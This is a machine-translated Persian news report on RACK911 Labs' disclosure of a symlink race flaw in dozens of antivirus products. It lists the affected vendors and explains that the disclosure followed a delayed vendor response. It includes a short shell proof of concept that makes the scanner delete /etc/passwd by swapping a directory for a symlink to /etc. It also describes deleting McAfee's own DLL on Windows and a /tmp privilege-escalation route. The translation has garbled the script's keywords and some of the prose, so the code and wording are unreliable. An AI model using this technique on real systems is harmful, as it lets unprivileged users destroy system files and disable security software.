محققان آزمایشگاه RACK911
برای انجام یک حمله، باید فایلی را آپلود کنید که آنتی ویروس آن را مخرب تشخیص دهد (مثلاً می توانید از امضای آزمایشی استفاده کنید)، و پس از مدتی مشخص، پس از شناسایی فایل مخرب توسط آنتی ویروس، اما بلافاصله قبل از فراخوانی تابع. برای حذف آن، دایرکتوری را با فایل با پیوند نمادین جایگزین کنید. در ویندوز، برای رسیدن به همان اثر، جایگزینی دایرکتوری با استفاده از پیوند دایرکتوری انجام می شود. مشکل این است که تقریباً همه آنتی ویروس ها پیوندهای نمادین را به درستی بررسی نمی کنند و با این تصور که در حال حذف یک فایل مخرب هستند، فایل موجود در دایرکتوری را که پیوند نمادین به آن اشاره می کند حذف می کنند.
در لینوکس و macOS نشان داده شده است که چگونه یک کاربر غیرمجاز می تواند /etc/passwd یا هر فایل سیستم دیگری را حذف کند، و در ویندوز کتابخانه DDL خود آنتی ویروس کار آن را مسدود کند (در ویندوز حمله فقط به حذف محدود می شود. فایل هایی که در حال حاضر توسط سایر برنامه ها استفاده نمی شوند). برای مثال، یک مهاجم میتواند دایرکتوری «exploit» ایجاد کند و فایل EpSecApiLib.dll را با امضای ویروس آزمایشی در آن آپلود کند و سپس فهرست «exploit» را با پیوند «C:\Program Files (x86)\McAfee\ جایگزین کند. Endpoint Security\Endpoint Security» قبل از حذف آن Platform»، که منجر به حذف کتابخانه EpSecApiLib.dll از کاتالوگ آنتی ویروس می شود. در لینوکس و macos، ترفند مشابهی را می توان با جایگزین کردن دایرکتوری با پیوند "/etc" انجام داد.
# / بن / SH
rm -rf /home/user/exploit ; mkdir /home/user/exploit/
wget -q https://www.eicar.org/download/eicar.com.txt -O /home/user/exploit/passwd
در حالی که inotifywait -m "/home/user/exploit/passwd" | grep -m 5 "OPEN"
do
rm -rf /home/user/exploit ; ln -s /etc /home/user/exploit
انجام شده
علاوه بر این، بسیاری از برنامههای آنتی ویروس برای لینوکس و macOS از نام فایلهای قابل پیشبینی هنگام کار با فایلهای موقت در فهرستهای /tmp و /private/tmp استفاده میکنند، که میتواند برای افزایش امتیازات به کاربر اصلی استفاده شود.
در حال حاضر، مشکلات قبلا توسط اکثر تامین کنندگان برطرف شده است، اما قابل ذکر است که اولین اطلاعیه ها در مورد مشکل در پاییز 2018 برای تولید کنندگان ارسال شد. اگرچه همه فروشندگان بهروزرسانیها را منتشر نکردهاند، حداقل 6 ماه برای وصله به آنها فرصت داده شده است و RACK911 Labs بر این باور است که اکنون برای افشای آسیبپذیریها رایگان است. خاطرنشان می شود که RACK911 Labs برای مدت طولانی در حال کار بر روی شناسایی آسیب پذیری ها بوده است، اما به دلیل تاخیر در انتشار به روز رسانی ها و نادیده گرفتن نیاز به رفع فوری امنیت، انتظار نداشت که کار با همکاران صنعت آنتی ویروس آنقدر دشوار باشد. چالش ها و مسائل.
محصولات تحت تأثیر (بسته آنتی ویروس رایگان ClamAV لیست نشده است):
- لینـوکــس
- BitDefender GravityZone
- Comodo Endpoint Security
- Eset File Security Security
- امنیت لینوکس F-Secure
- Kaspersy Endpoint Security
- امنیت McAfee Endpoint
- Sophos Anti-Virus برای لینوکس
- ویندوز
- ضد ویروس Avast Free
- ضد ویروس رایگان Avira
- BitDefender GravityZone
- Comodo Endpoint Security
- F-Secure Computer protection
- FireEye Endpoint Security
- رهگیری X (Sophos)
- Kaspersky Endpoint Security
- Malwarebytes برای ویندوز
- امنیت McAfee Endpoint
- گنبد پاندا
- Webroot امن هر کجا
- از MacOS
- AVG
- امنیت کامل BitDefender
- امنیت سایبری Eset
- کسپرسکی اینترنت سکیوریتی
- McAfee Total Protection
- Microsoft Defender (بتا)
- امنیت نورتون
- Sophos Home
- Webroot امن هر کجا
منبع: opennet.ru